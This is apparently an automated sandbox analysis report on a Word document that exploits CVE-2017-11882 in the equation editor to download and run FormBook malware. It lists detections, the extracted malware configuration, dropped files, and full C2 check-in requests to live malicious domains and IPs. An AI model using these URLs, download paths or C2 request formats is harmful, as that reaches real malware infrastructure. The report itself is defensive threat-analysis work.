Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1976, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 1484

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 67.199.248.10, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1976, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1976, TargetFilename: C:\Users\Public\69577.exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://neuromedic.com.br/cgi./IMG-11862.pdf

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 5.2.AddInProcess32.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bbf", "KEY1_OFFSET 0x1d5ca", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1d6d3", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x3a0289d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d719b", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad011e04", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014b1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf	ReversingLabs: Detection: 43%
Source: C:\Users\Public\69577.exe	ReversingLabs: Detection: 43%

Multi AV Scanner detection for submitted file

Show sources

Source: IMG-11862.doc	Virustotal: Detection: 38%			Perma Link
Source: IMG-11862.doc	ReversingLabs: Detection: 24%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf	Joe Sandbox ML: detected
Source: C:\Users\Public\69577.exe	Joe Sandbox ML: detected

Source: 5.2.AddInProcess32.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.systray.exe.c0000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\69577.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: systray.pdbB source: AddInProcess32.exe, 00000005.00000002.2158465105.0000000000464000.00000004.00000020.sdmp
Source:	Binary string: AddInProcess32.pdb}o source: 69577.exe, 00000004.00000003.2100576876.00000000062C3000.00000004.00000001.sdmp
Source:	Binary string: AddInProcess32.pdb source: 69577.exe, 00000004.00000003.2100576876.00000000062C3000.00000004.00000001.sdmp, AddInProcess32.exe
Source:	Binary string: systray.pdb source: AddInProcess32.exe, 00000005.00000002.2158465105.0000000000464000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, systray.exe

Software Vulnerabilities:

Source: C:\Users\Public\69577.exe	Code function: 4x nop then jmp 0025AE3Bh		4_2_0025A66A
Source: C:\Users\Public\69577.exe	Code function: 4x nop then mov esp, ebp		4_2_0025F7E8

Source: global traffic

DNS query: name: bit.ly

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 35.208.61.46:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 35.208.61.46:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 35.208.61.46:80

Connects to a URL shortener service

Show sources

Source: unknown

DNS query: name: bit.ly

Source: global traffic	HTTP traffic detected: GET /bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp HTTP/1.1Host: www.theprintshop.inkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bsl/?NN=GgBvVf5PQIOdcMEbYgw1IQ+nD3ax/bg71NWpn/5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg==&Epu=zv50BpeHpnjp HTTP/1.1Host: www.bucklandnewton.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 208.91.197.39 208.91.197.39

Source: Joe Sandbox View	ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View	ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG

Source: global traffic	HTTP traffic detected: GET /3oj1Gnn HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi./IMG-11862.pdf HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: neuromedic.com.br

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6894A6BA-6F93-4194-97B0-E6749671AC21}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /3oj1Gnn HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi./IMG-11862.pdf HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: neuromedic.com.br
Source: global traffic	HTTP traffic detected: GET /bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp HTTP/1.1Host: www.theprintshop.inkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bsl/?NN=GgBvVf5PQIOdcMEbYgw1IQ+nD3ax/bg71NWpn/5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg==&Epu=zv50BpeHpnjp HTTP/1.1Host: www.bucklandnewton.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: 69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: 69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: 69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: 69577.exe, 00000004.00000002.2118681264.0000000005B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2356037346.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 69577.exe, 00000004.00000002.2111272817.00000000023C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.2123702347.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2122208405.00000000041AD000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2121116386.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoz
Source: explorer.exe, 00000006.00000000.2128892011.000000000856E000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2121116386.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icol
Source: explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: 69577.exe, 00000004.00000002.2118681264.0000000005B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2356037346.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2122554413.00000000042CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2121116386.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2113821795.0000000000260000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: 69577.exe, 00000004.00000002.2111272817.00000000023C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: 69577.exe, 00000004.00000002.2111272817.00000000023C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com(
Source: 69577.exe, 00000004.00000002.2111272817.00000000023C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf			Jump to dropped file

Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419D60 NtCreateFile,	5_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419E10 NtReadFile,	5_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419E90 NtClose,	5_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419F40 NtAllocateVirtualMemory,	5_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419DB3 NtCreateFile,	5_2_00419DB3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419E8A NtClose,	5_2_00419E8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008400C4 NtCreateFile,LdrInitializeThunk,	5_2_008400C4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00840048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00840048
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00840078 NtResumeThread,LdrInitializeThunk,	5_2_00840078
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083F9F0 NtClose,LdrInitializeThunk,	5_2_0083F9F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083F900 NtReadFile,LdrInitializeThunk,	5_2_0083F900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_0083FAD0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_0083FAE8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_0083FBB8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_0083FB68
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_0083FC90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_0083FC60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FD8C NtDelayExecution,LdrInitializeThunk,	5_2_0083FD8C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_0083FDC0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_0083FEA0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_0083FED0
